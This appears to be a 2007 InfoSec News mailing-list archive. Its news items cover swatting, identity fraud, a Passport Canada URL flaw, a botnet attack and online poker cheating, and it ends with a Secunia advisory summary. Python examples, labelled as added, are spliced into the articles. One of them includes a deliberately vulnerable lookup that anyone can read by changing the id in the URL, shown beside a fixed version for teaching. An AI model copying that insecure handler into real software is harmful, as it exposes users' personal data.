Swatters, as the malicious pranksters are referred to, use a combination of social engineering, phone phreaking prowess and computer hacking to spoof the phone numbers of individuals they want to harass. They then make emergency calls to police departments and report crimes in process, in many cases prompting a response from SWAT teams who conduct emergency raids on the homes of people whose numbers were spoofed.
In many cases, the victims were fellow participants in telephone party lines, which largely act as the phone equivalent of internet relay chat groups.

Trowbridge, who went by the names "Jason from California" and "John from California," furthered the scheme by mining personal information about the victims from a host of sources, including consumer reporting agencies, pizza delivery records and newspaper subscription records, according to court documents signed by the defendant.

The personal information Trowbridge provided allowed the gang to make fake emergency calls that had the ring of authenticity. In one case, they posed as an Alvarado, Texas man whose daughter was a party line participant. They told a police dispatcher that he had shot and killed members of his family and was armed with an AK47 machine gun. The caller, who claimed to be high on hallucinogenic drugs, then threatened to kill his remaining hostages unless he was given $50,000 and safe passage out of the country. Police responded by sending officers to the residence of the real man.

In September of last year, Ward himself was swatted by members of the gang. But just a month later, as he admitted in court documents filed last month, he offered money to anyone who would carry out a Swat attack on the Alvarado family. Ward, who went by the name "Dark Angel," also confessed to obtaining personal information on victims by socially engineering telephone company employees.

The documents provide other colorful details. Among them, Rosoff threatened to have the phone service of a Cheboygan, Michigan woman disconnected unless she agreed to provide him with phone sex. When she refused, Rosoff used social engineering to terminate her phone service. He also made false reports to police claiming the woman's children were being abused and discussed ways of having her falsely arrested.

During the course of the conspiracy - which lasted from late 2002 to June of this year and involved as many as 20 individuals - the participants also initiated calls to employers, landlords, families and friends of party line members they held a grudge against. Some of the members who refused to stop using the line found their friends and families swatted.

The case was investigated by the FBI field office in Dallas and prosecuted by the US Attorney's Office for the Northern District of Texas.

[1] http://www.theregister.co.uk/2007/11/19/911_phone_phreakers/

From alerts at infosecnews.org Thu Dec 6 04:04:09 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Couple charged with living high life on neighbours' accounts
Message-ID:

http://www.guardian.co.uk/usa/story/0,,2222534,00.html

By Ed Pilkington in New York
December 5, 2007
Guardian Unlimited

The gallery of photographs told one story: a good-looking couple smiling to camera in front of the Eiffel Tower, riding horses on a white sand beach in Hawaii, sporting matching red swimwear in a luxury seaside resort.

When police officers searched the Philadelphia flat of Jocelyn Kirsch and Edward Anderton they uncovered a different story. They found four computers, a scanner, two printers and a machine that makes identity cards - the equipment needed to support what detectives now believe was a two-year, $100,000 (£49,000) spending spree funded largely by fraud.

On Friday the couple were charged with identity fraud, forgery and a host of other counts. The police investigation began last month after the couple's neighbour complained that her identity had been stolen. The neighbour said she had been told to pick up a package at a nearby delivery station even though she had ordered nothing, and police watched as Kirsch and Anderton picked up the package, which turned out to be luxury lingerie from London.

Piecing together events, detectives now allege that the couple, who were both privately educated at good schools and colleges, cheated several people in their apartment building. "They were like a parasite that infected that building," Detective Terry Sweeney told the Associated Press. "They were two young people that were given many gifts in life. And the very best thing they could do was victimise other people."

In their flat they had fake drivers' licences, numerous credit cards and keys to the apartments and postal boxes of neighbours. There was also $18,000 in cash, and a copy of The Art of Cheating: A Nasty Little Book for Tricky Little Schemers and Their Hapless Victims [1].

Their travels took them to Paris, London, Hawaii and the Turks & Caicos Islands. Kirsch, 22, a student at Drexel University in Philadelphia, treated herself to a $2,200 hair extension using a false cheque. Anderton, aged 25, a graduate of the Ivy League University of Pennsylvania, was recently sacked from a job as a financial analyst, though the reasons for his dismissal were unclear.

So far police say they have found five victims of the couple's activities, one of whom was stung for $30,000.

[1] http://www.amazon.com/exec/obidos/ASIN/1416549137/c4iorg

From alerts at infosecnews.org Thu Dec 6 04:04:21 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] HITBSecConf2007 Malaysia Videos Now Available
Message-ID:

Forwarded from: Praburaajan

The videos from Hack In The Box Security Conference 2007 Malaysia are now available for download! The files were created in Quicktime, however if you're having trouble playing them on your platform, please ensure you have the latest 3IVX codec installed.

Time to fire up your favorite Bit Torrent clients and please remember to seed! Go to http://video.hitb.org/2007.html to download the torrents.

On a related note, the Call for Papers for HITBSecConf2008 - Dubai is still open. If you're interested in speaking at the upcoming event in the UAE, please take a look at the CFP page for details on how to submit. We are especially looking for more submissions from the EMEA region.

From alerts at infosecnews.org Thu Dec 6 04:04:42 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Passport security breach repaired, official says
Message-ID:

http://www.theglobeandmail.com/servlet/story/RTGAM.20071205.wpassport05/BNStory/National/home

By Kenyon Wallace
Globe and Mail
December 5, 2007

Passport Canada says that a security breach in its passport application website that allowed easy access to the personal information of applicants has been repaired.

"We're definitely looking into how this happened, but right now, it's fixed," said Fabien Lengelle, a spokesman for Passport Canada. "We are very committed to security and we would like to reassure the Canadian public that passport online is a secure application."

Mr. Lengelle added that the personal information of applicants is never stored online.

However, an Ontario man applying online for a passport last Thursday discovered he could access personal information - such as social insurance numbers, birthdates and driver's licence numbers - of other applicants by altering one character in the Internet address displayed by his Web browser.

Passport Canada shut the website down on Friday, but when it was reopened on Monday afternoon, the personal information of applicants could still be accessed.

In November, 29,000 people entered their personal data into the website, according to Mr. Lengelle.

During Question Period yesterday, Foreign Affairs Minister Maxime Bernier told the House of Commons that he spoke with Passport Canada CEO Gérard Cossette and was assured that the security problem had been fixed.

"Now the Internet site of Passport Canada is one of the most secure," Mr. Bernier said.
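The flaw the Globe and Mail describes, an applicant reaching another applicant's record by changing one character of the address, is a lookup keyed on a guessable id with no ownership check. The example below is added here and is not Passport Canada's code: it puts the vulnerable handler beside the hardened one and counts refused lookups, since a run of refusals against consecutive ids is what a defender would alert on. The record store, user names, ids and session scheme are all constructed.

```python
"""Added example (not Passport Canada's code): an application-status lookup
keyed only by a sequential id, beside the object-level authorization check
that stops a logged-in applicant from reading a neighbouring record by
editing one character of the URL. All records, names and ids are constructed."""
import secrets
from collections import Counter

# Constructed applicant records keyed by a sequential application number:
# the kind of id that differs by one character between two applicants.
APPLICATIONS = {
    "1000341": {"owner": "alice", "sin": "***-***-001", "status": "in review"},
    "1000342": {"owner": "bob",   "sin": "***-***-002", "status": "approved"},
}

SESSIONS = {}        # session cookie -> username (constructed session store)
DENIED = Counter()   # session cookie -> number of refused lookups (audit trail)


def login(user):
    """Issue an unguessable session cookie for an already-authenticated user."""
    cookie = secrets.token_urlsafe(16)
    SESSIONS[cookie] = user
    return cookie


def vulnerable_status(cookie, app_id):
    """Checks *who* is asking but never *whose* record is asked for: any
    applicant with a valid session can read any application number."""
    if cookie not in SESSIONS:
        return None
    return APPLICATIONS.get(app_id)


def hardened_status(cookie, app_id):
    """Same lookup with an ownership check: the record must belong to the
    session's user. A refusal looks the same whether the id belongs to someone
    else or does not exist, so the endpoint also cannot be used to confirm
    which ids are valid."""
    user = SESSIONS.get(cookie)
    if user is None:
        return None
    rec = APPLICATIONS.get(app_id)
    if rec is None or rec["owner"] != user:
        DENIED[cookie] += 1   # record the refusal for the check below
        return None
    return rec


def denied_lookups(cookie):
    """Refused lookups per session: several in a row from one session is the
    signal to alert on, independent of whether the ownership check held."""
    return DENIED[cookie]
```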
The security breach discovery comes in the midst of an audit of Passport Canada's handling of personal information. The audit, undertaken by the office of the federal Privacy Commissioner in the fall, is examining whether the federal agency is meeting its obligations under the Privacy Act.

Colin McKay, a spokesman for the Privacy Commissioner, said the audit will now include the website security breach. Mr. McKay said Privacy Commissioner Jennifer Stoddart would not comment on the security flaw until she received more information from investigators.

The passport application website, launched in January, 2005, uses a combination of policy and technology - called Public Key Infrastructure - that is supposed to provide secure online working environments. To apply for a passport online, users must obtain an e-pass that allows access to services with enhanced security.

The e-pass Canada website states that session cookies - small pieces of data specific to an applicant's computer that are exchanged with the website - may be used. But cookies are not the best way to ensure security, says Carlisle Adams, an Internet data security expert and professor at the University of Ottawa.

"People can hijack cookies from other people's sessions or someone could log on to somebody else's browser through a virus or by physically using their computer," Mr. Adams said. "It's not foolproof security by any means."

Identity theft in Canada is on the rise, fuelled in part by advances in technology, according to Inspector Barry Baxter, officer in charge of counterfeit and identity fraud with the RCMP. Insp. Baxter said personal information is usually stolen to obtain goods and services under someone else's name, or to assume someone else's identity.

"You can submit false applications, apply for credit cards, apply for health services, and all those kinds of services that require you to identify yourself," Insp. Baxter said.

Combatting identity theft is especially difficult because the crime is global, he added. "There's a different scam every minute of the day."

The federal government is considering implementing legislation that would require private sector organizations to disclose security breaches. On Nov. 21, Justice Minister Rob Nicholson introduced legislation making it an offence to obtain, possess or traffic identity information for the purposes of committing a crime.

Major security breaches

The following are major security breaches in 2007:

January: TJX Cos., parent company of retail outlets Winners and HomeSense, told the public that computer hackers may have up to two million Canadian credit card numbers.

January: CIBC subsidiary Talvest Mutual Funds lost a computer file with account information for 470,000 customers while in transit between company offices.

April: A computer disc containing social security numbers, addresses, and birthdates of almost three million patients went missing from Affiliated Computer Services, a private contractor handling health-care claims for the Department of Community Health in Atlanta.

August: Monster.com announced that hackers broke into the U.S. online recruitment site's password-protected library and stole the personal information of at least 1.3 million job seekers.

September: Contact information for more than 6.3 million customers of the Omaha-based online brokerage firm TD Ameritrade Holding Corp. was stolen after a company database was hacked.

November: Britain's tax and customs service announced it lost disks containing banking and personal data of 25 million people.
From alerts at infosecnews.org Thu Dec 6 04:04:58 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] After hacking incident, server security boosted Message-ID: http://media.www.dailypennsylvanian.com/media/storage/paper882/news/2007/12/04/News/After.Hacking.Incident.Server.Security.Boosted-3130557.shtml By Jessica Sidman The Daily Pennsylvanian 12/4/07 Although the University improved computer security after a Penn student allegedly caused a server crash in February 2006, a similar type of attack could still cause problems for even the largest Web servers. Engineering junior Ryan Goldstein was indicted last month for computer-fraud conspiracy after he allegedly helped a New Zealand hacker nicknamed "AKILL" carry out the attack using a botnet - a virtual network of virus-infected computers controlled from a central, remote location. Hackers can use a botnet for sending spam, identity theft or denial-of-service attacks. Goldstein's alleged hacking caused an inundation of traffic on the Engineering School's server, leading to a server crash. The Engineering staff overlooked the increase in traffic because of recent modifications to the Engineering School's network at the time, according to an affidavit filed by FBI agent and computer-crimes specialist Jason Stroud. University technicians made several changes at the time and continue to make security improvements as they learn of new threats, IT Senior Director Helen Anderson wrote in an e-mail. In addition, Engineering students must now register for permission to run CGI script, a technology used in web servers. But a large attack could still potentially cripple the server. "Web servers are sized for their normal usage rate plus extra capacity for busy times," Anderson said. "A botnet of more than a million computers is enough to cause trouble for even the largest Web servers." 
Goldstein used a fellow student's username and password to gain access to a University server, Stroud reported. The user logged in 57,958 times in four days, with 13,289 failed attempts, from computers in North America, Europe, Africa, Asia and Latin America and then downloaded unusual files onto the Penn server. The inundation of traffic caused the server to crash. "It's been likened to trying to drink from a fire hose," FBI special agent JJ Klaver said. "You can shut down an entire computer network by flooding it with input." The Penn server attack denied service to 4,000 students, faculty and staff members. However, an attack on a corporate server, such as Amazon.com, could cause a company enormous economic losses, said Fred Cate, the director of the Center for Applied Cybersecurity Research at Indiana University School of Law. Similar attacks can also be used as online vandalism, political protests or to hinder corporate competitors. Goldstein pleaded not guilty to the computer-fraud conspiracy charges, and he is still attending classes. He faces a maximum sentence of five years in prison or a $250,000 fine. Copyright 2007 The Daily Pennsylvanian From alerts at infosecnews.org Thu Dec 6 04:05:13 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Aussie company comes under fire for probing scandalous poker site Message-ID: http://www.itnews.com.au/News/66328,aussie-company-comes-under-fire-for-probing-scandalous-poker-site.aspx By Liz Tay 5 December 2007 The engagement of Australian consultancy Gaming Associates to investigate an alleged $7 million scandal has raised more questions about the integrity of Absolute Poker and its parent companies. Gaming Associates was commissioned last month to conduct an audit into a suspected security breach that gave one player full view of the cards held by his opponents. 
The audit comes several months after the scam was first uncovered by a group of players on the Two Plus Two online discussion boards. Current investigations have, as yet, failed to placate users of the popular U.S.-based forum.

"This proposed investigation makes us uneasy for a few reasons," said Mason Malmuth of Two Plus Two Publishing. "First, according to its press release, Absolute Poker is funding the investigation directly, with no third party involved to ensure objectivity.

"Finally, Two Plus Two believes that a report from Gaming Associates, an Australian company apparently dealing primarily with Antigua and Barbados companies, may not maintain the same weight and reliability as the international law firm retained by Two Plus Two."

Earlier this month, Two Plus Two Publishing was approached by an Absolute Poker representative, who wanted Two Plus Two to release a statement supporting Absolute Poker on its forums, Malmuth said.

Malmuth responded with a fraud investigation proposal in which Two Plus Two would act as an unbiased, non-profiting arbitrator between Absolute Poker and the investigators. The offer was declined.

"Two Plus Two is essentially the only entity that would be considered unbiased in this matter. So anything done with our name on it would have much credibility," Malmuth told ITnews.com.au. "We felt this problem was bigger than Absolute and that by doing this investigation it would be good for the whole industry.

"Absolute Poker has now told us that they have no interest in our proposal. So I expect nothing will come from it," he said.

Gaming Associates' audit report is not expected until 7 December. In the meantime, however, the online poker community has been handing out its own version of citizens' arrests.
Fingers have been pointed at Absolute Poker's co-founder, Scott Tom, and former Operations Director, Alan 'AJ' Green, and punishments range from degradingly edited images, to accusations of drug abuse, and even to what might be perceived as threats to Tom's family.

"Is this Scott's first wife and child," asks one discussion board user. "What's her name? Any previous wives and/or children? Any other weak spots besides father? Mother, siblings, other family members?"

"Does anyone know AJ's educational background," another post reads. "Where did he go to college? What were his majors and/or minors?"

Official statements released by Absolute Poker to its users seem to confirm allegations that an employee had been involved in the alleged security breach.

"Based upon our preliminary findings, it appears that the integrity of our poker system was compromised by a high-ranking trusted consultant employed by AP whose position gave him extraordinary access to certain security systems," writes Joe Norton, owner of Tokwiro Enterprises ENRG, which holds 100 per cent interest in Absolute Poker.

"We consider this security breach to be a horrendous and inexcusable offence," he said.

Absolute Poker is currently in the process of reimbursing players who were affected by the cheating account.

It is yet to be seen if the scandal leaves a permanent scar on online poker, which requires a great deal of trust between players, their opponents, and gaming platforms.


From alerts at infosecnews.org Fri Dec 7 01:12:09 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] US helps enhance cops skills vs cyber-terrorism

http://www.abs-cbnnews.com/storypage.aspx?StoryId=101545

By EDITH REGALADO
The Philippine Star
12/6/2007

DAVAO CITY - The United States is helping enhance the capabilities of policemen in Southern Mindanao in the fight against cyber-terrorism, which has been widely used by terrorists in their operations.
Chief Superintendent Andres Caro II, Southern Mindanao regional police director, said the US State Department's Anti-Terrorism Assistance (ATA) program has jointly developed with the Anti-Terrorism Office of the Philippine Public Safety College a training course for local policemen that would improve their skills in resolving incidents related to acts of cyber-terrorism.

Since its inception in 1983, the US State Department's ATA program has reportedly trained over 50,000 foreign police and security forces from over 141 countries to combat, deter and solve terrorist crimes in their respective countries.

Caro told The STAR that at least 40 police officers from the different city and provincial police units in Southern Mindanao are completing tomorrow their five-day training course under the ATA program.

The course gave the police officers an overview of the process of securing a terrorism-related crime scene that may involve the seizure of electronic or digital evidence.

Caro said the "cyber crime incident response course" is relevant since terrorist groups have gone online to communicate with each other, spread propaganda, recruit new members, secure financial support, and issue orders.

Edward Schlachter, manager of the US Embassy's ATA program, said the training puts an emphasis on proper evidence collection techniques and other basic investigative and documentation activities, including properly shutting down systems and identifying the many types of media that may contain evidence.

"The training and skills you will gain here will help you follow proper evidence procedures to ensure that criminals who utilize computers and digital devices are prosecuted to the full extent of the law," Schlachter told the over 40 participants in the five-day cyber crime incident response course.
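The "proper evidence collection techniques and ... documentation activities" the course emphasises come down, on the technical side, to one discipline: hash every seized item at the moment of collection, write down who took it and when, and re-hash it before anyone examines it so that an altered copy cannot pass as the original. The following is an added example of that intake-and-verify step, not material from the ATA course or the article; the evidence file name, case identifier and manifest layout are constructed for illustration.

```python
"""Record and later verify the integrity of seized digital evidence.

Added example. The evidence file, case identifier and manifest layout are
constructed for illustration; they do not describe the ATA course material.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file so a large disk image never has to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def record_evidence(manifest_path, evidence_path, case_id, collector, description):
    """Append a custody entry: who collected what, when, and its hash at that time."""
    entry = {
        "case_id": case_id,
        "item": os.path.basename(evidence_path),
        "size": os.path.getsize(evidence_path),
        "sha256": sha256_file(evidence_path),
        "collected_by": collector,
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "description": description,
    }
    manifest = []
    if os.path.exists(manifest_path):
        with open(manifest_path) as f:
            manifest = json.load(f)
    manifest.append(entry)
    with open(manifest_path, "w") as f:
        json.dump(manifest, f, indent=2)
    return entry


def verify_evidence(manifest_path, evidence_dir):
    """Re-hash every recorded item; return {item: True/False}.

    A False means the copy handed to the examiner is not byte-for-byte the
    one that was seized, and the custody chain for that item is broken.
    """
    with open(manifest_path) as f:
        manifest = json.load(f)
    results = {}
    for entry in manifest:
        path = os.path.join(evidence_dir, entry["item"])
        results[entry["item"]] = (
            os.path.exists(path) and sha256_file(path) == entry["sha256"]
        )
    return results


def demo():
    """Constructed walk-through: seize a file, record it, then detect a change."""
    workdir = tempfile.mkdtemp()
    item = os.path.join(workdir, "phone-sdcard.img")  # constructed item name
    with open(item, "wb") as f:
        f.write(b"constructed image contents\n" * 1000)
    manifest = os.path.join(workdir, "custody.json")
    record_evidence(manifest, item, "CASE-0000", "officer-example",
                    "SD card from seized handset")  # constructed values
    before = verify_evidence(manifest, workdir)
    with open(item, "ab") as f:  # simulate a later modification of the item
        f.write(b"x")
    after = verify_evidence(manifest, workdir)
    return before["phone-sdcard.img"], after["phone-sdcard.img"]


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The manifest is the documentation half of the procedure: it is what lets an examiner, or a court, tie a hash to a person, a time and an item. Keeping the manifest on separate, write-once media from the evidence itself is what makes the later verification meaningful.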
From alerts at infosecnews.org Fri Dec 7 01:12:47 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Law & Order - No ID Theft Reported From Stolen Computers

http://www.modbee.com/local/story/143953.html

December 06, 2007

Employees at a Modesto mortgage company that had computer equipment stolen last month say they believe information on the equipment can't be used for identity theft.

Matt Crawford, broker at All-American Mortgage, said the information on a stolen computer server was password protected, so it would be difficult for someone to access it. He said he had no reason to believe a thief would have such a password.

A burglar broke into All-American's Coffee Road office sometime during the weekend of Nov. 10 and stole the server, a modem and a wireless router.

Crawford said the company warned hundreds of clients whose information was on the computer about the break-in and theft, but has received no reports of identity theft.

"That doesn't eliminate the possibility that it could still happen," said Crawford, who added that company officials still are determining whose information was on the server.

Crawford said he believes the thief or thieves stole the equipment as a way to disrupt All-American's operations rather than for resale value or identity theft. He said Modesto police are investigating the break-in.

[...]


From alerts at infosecnews.org Fri Dec 7 01:13:04 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Ranum's Wild Security Ride

http://www.darkreading.com/document.asp?doc_id=140640

By Kelly Jackson Higgins
Senior Editor
Dark Reading
December 5, 2007

Most equestrians ride English or Western style -- Marcus Ranum prefers Western-Medieval. The security industry icon best known for his pioneering work in firewalls will start training this spring to reach his goal of shooting a Mongolian recurve bow at a target while on horseback.
But first he has to desensitize his horse to the loud snapping sound the bow makes. "I have no idea if this is going to work," says the 45-year-old Ranum, who as a kid participated in Medieval reenactments, and boasts of being one of the first of his friends to score the Dungeons & Dragons series of books back then.

Ranum fell into horses in much the same way he landed in security, not by design. Although he ultimately made a name for himself in firewall and intrusion detection technology, Ranum says security -- like horses -- was never really his thing.

"My interest was in systems administration and making things work, and security was a side effect of that," says Ranum, who lives in a self-described "Ted Kaczynski-style compound" in rural Pennsylvania with his horses, dogs, and cats. "I considered it a sideline. But unfortunately, it became my focus."

He doesn't take credit for inventing the firewall -- only for synthesizing and streamlining the concepts of a firewall into the DEC SEAL, which he did while working on DEC's internal Internet gateway. "This whole business of calling me the inventor is wrong... It was some marketing BS," says Ranum, who designed and deployed the DEC SEAL in 1990, which is considered by some to be the first commercial firewall.

"The DEC SEAL was interesting because it had a part number and a manual and corporation behind it," he says, which at the time was unique.

He's currently the chief security officer for Tenable Security, where he acts as "advice-giver" for Tenable developers and helps teach customers how to use the company's Nessus vulnerability scanner. But he says overall, he sees the value of his work in security as ultimately short-term: "Computer security is going to disappear after a while," he says.
Ranum has found a kindred spirit in Bruce Schneier on this fatalistic view of the security industry -- Schneier is well-known for his controversial view that security shouldn't be a separate market and instead be incorporated into IT products. The two regularly stage point/counterpoint columns where they debate hot industry topics. "Bruce and I agree on a lot of stuff," Ranum says. "Sometimes we have to come up with stuff to disagree on" for our column, he says. (See Schneier On Schneier.)

But it's a different story when it comes to vulnerability researchers: Ranum is vocal about his distaste for their work. "If they are so freaking smart, they should be writing firewall and free executable software and giving it away," he says. He argues that vulnerability research only hurts software developers and has basically twisted the industry's view on security: "They've managed to convince customers that they are supposed to be grateful," he says. "But it's [vulnerability research] making software vastly more expensive" to buy, he says.

Ranum says hacking never appealed to him. The closest he ever got to doing some hacking of his own, he says, was when he was an undergraduate at Johns Hopkins University and tweaked the Cloak program to clean up his logs and cover his tracks when he played Rogue on the university's VAX machines. "That way I could disappear when I was playing games on the VAX," he says. "That's hard to say I was hacking since I didn't have to break in to" use the machine, he says. "Even then -- as now -- I never thought hacking was very interesting," he says.

Ranum says security really boils down to this: "Security is very simple: Don't do something stupid and you should be just fine," he says.

Personality Bytes

* What scares Ranum most: "There's a lot of outsourcing happening, and we've de-skilled our federal workforce. That scares the hell out of me. We should be worried about how we spend our money on the best and brightest in the government."
* On cyberwarfare: "How can you dare talk about fighting cyberwarfare when college kids in China can penetrate the Defense Department network like Swiss cheese?"

* What most people don't know about him: "I'd rather be an artist."

* Biggest pet peeve: "Intellectual dishonesty."

* Biggest regret: "I wish I had patented some of my work."

* Favorite hangout: "Home."

* Comfort food: "Tapioca pudding."

* Music: "I don't download music. I buy it and rip CDs. The latest thing I bought was Robert Plant and Alison Krauss's [CD]."

* Wheels: "A '74 Belarus 547 tractor, and a GMC Suburban."

* PC or Mac: "I hate all of them... I have an eight-year-old laptop."

* What Ranum would like to be most known for: "Telling the truth."


From alerts at infosecnews.org Fri Dec 7 01:13:20 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Secunia Weekly Summary - Issue: 2007-49

========================================================================

The Secunia Weekly Advisory Summary
2007-11-29 - 2007-12-06

This week: 74 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

New blog entry: Vendors still use the "legal" weapon

In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products.
Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the "Swiss Army Knife" in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security.

...[more information in the full blog]...

Our response to these claims and accusations

Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: To provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general.

Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret.

It is truly sad to see that certain vendors like Autonomy still behave like many software vendors did back in the previous millennium.

Read more and see the correspondence:
http://secunia.com/blog/15/

========================================================================
2) This Week in Brief:

Some vulnerabilities have been acknowledged in Novell BorderManager, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system.

An unspecified error in Novell Client Trust can be exploited to execute arbitrary code.
This may be related to a prior Secunia advisory in the same application reported early last month:
http://secunia.com/advisories/27468/

An error in the handling of full-width and half-width Unicode-encoded HTTP traffic can be exploited to bypass certain security controls. This may be related to a prior Secunia advisory on the same software reported in early September 2007:
http://secunia.com/advisories/26698/

Novell also reports that proxy authentication and access controls are bypassed when requests come through another proxy.

Patches are available in Support Pack 5 Interim Release 1. Users are urged to apply updates as soon as possible.

For more information:
http://secunia.com/advisories/27963/

--

A highly critical vulnerability has been reported in avast! Home/Professional, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an error within the handling of specially crafted TAR files. This can be exploited to corrupt heap memory via certain unspecified TAR fields.

The vendor has released a patch solving this vulnerability in versions prior to 4.7.1098.

For more information:
http://secunia.com/advisories/27929/

Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable:
https://psi.secunia.com/

Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable:
http://secunia.com/network_software_inspector/

--

A highly critical vulnerability has been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an unspecified error in the HSQLDB database engine and can be exploited to execute arbitrary static Java code via a specially crafted database document.

A fixed version is available for users.
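The full-width/half-width encoding issue noted in the Novell BorderManager item above is an instance of a general problem: a security control that compares a request path against its rules before the path has been brought into canonical form can be slipped past by any encoding that a later component silently decodes. The following is an added example, not Novell's code or Secunia's. It assumes a constructed, proxy-style deny list on path prefixes and a constructed access-log format, and shows the check done on the canonical form (percent-decoded, NFKC-normalized, case-folded) beside the naive one, plus an audit pass over log lines that surfaces requests whose path changes under normalization.

```python
"""Canonicalize request paths before applying path-based access control.

Added example. The deny list, request paths and access-log lines below are
constructed for illustration.
"""
import unicodedata
from urllib.parse import unquote

# Constructed rule set: paths under these prefixes require an authenticated session.
DENIED_PREFIXES = ("/admin/", "/internal/")


def canonicalize_path(raw_path):
    """Percent-decode, then NFKC-normalize, then case-fold.

    NFKC folds compatibility variants onto their canonical characters, e.g.
    U+FF0F FULLWIDTH SOLIDUS -> '/', U+FF41 FULLWIDTH LATIN SMALL LETTER A -> 'a',
    and half-width katakana onto their standard forms, so the access decision is
    made on the same string the backend will eventually act on.
    """
    decoded = unquote(raw_path)
    return unicodedata.normalize("NFKC", decoded).lower()


def naive_is_denied(raw_path):
    """Weak check: compares the raw, still-encoded path against the rules."""
    return raw_path.lower().startswith(DENIED_PREFIXES)


def hardened_is_denied(raw_path):
    """The same rule set applied to the canonical form."""
    return canonicalize_path(raw_path).startswith(DENIED_PREFIXES)


def find_normalization_evasions(log_lines):
    """Audit helper: return the raw paths of requests whose decoded path is
    not already in NFKC form. Ordinary clients essentially never send
    full-width ASCII look-alikes in a path, so every hit deserves a look.

    Assumed (constructed) log format: "<client> <method> <path> <status>".
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        raw_path = parts[2]
        decoded = unquote(raw_path)
        if unicodedata.normalize("NFKC", decoded) != decoded:
            hits.append(raw_path)
    return hits


# Constructed access-log lines. %EF%BC%A1 is UTF-8 for U+FF21 (full-width 'A'),
# %EF%BD%84 for U+FF44 (full-width 'd').
SAMPLE_ACCESS_LOG = [
    "10.0.0.5 GET /index.html 200",
    "10.0.0.5 GET /admin/users 403",
    "10.0.0.7 GET /%EF%BC%A1dmin/users 200",
    "10.0.0.7 GET /public/%EF%BD%84ocs 200",
]


if __name__ == "__main__":
    lookalike = "/\uff41\uff44\uff4d\uff49\uff4e/users"  # "/admin/users" in full-width letters
    print("naive   :", naive_is_denied(lookalike))      # False: the rule never matches
    print("hardened:", hardened_is_denied(lookalike))   # True
    print("suspect :", find_normalization_evasions(SAMPLE_ACCESS_LOG))
```

Two design points matter in practice. Decoding must happen exactly once, at the same layer and in the same way the backend decodes, or the canonicalizer introduces a second mismatch of its own; and the normalized path, not the raw one, is what should be forwarded, so a downstream component cannot re-interpret the original bytes differently. The audit function is the cheap detection side of the same control: a request whose path is not already in normalized form is either a broken client or someone probing the filter.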
For more information:
http://secunia.com/advisories/27928/

Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable:
https://psi.secunia.com/

Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable:
http://secunia.com/network_software_inspector/

--

A moderately critical vulnerability has been reported in Cisco Security Agent for Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

The vulnerability is caused by a boundary error in an unspecified system driver used by the application. This can be exploited to cause a buffer overflow via a specially crafted packet sent to port 139/TCP or 445/TCP, and successful exploitation may allow execution of arbitrary code.

The vulnerability is reported in all versions of Cisco Security Agent for Windows.

For more information:
http://secunia.com/advisories/27947/

Corporate users are urged to request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable:
http://secunia.com/network_software_inspector/

--

VIRUS ALERTS:

During the past week Secunia collected 171 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA27755] Apple QuickTime RTSP "Content-Type" Header Buffer Overflow
2. [SA27842] Linux Kernel "isdn_net_setcfg()" Buffer Overflow Vulnerability
3. [SA27863] rsync Two Security Bypass Vulnerabilities
4. [SA27875] FTP Admin Multiple Vulnerabilities
5. [SA27860] IBM Lotus Notes Client for Linux Insecure File Permissions
6. [SA27873] Asterisk Postgres Realtime Engine SQL Injection
7. [SA27827] Asterisk Call Detail Record Postgres SQL Injection
8. [SA27829] Cisco Unified IP Phone Extension Mobility Weakness
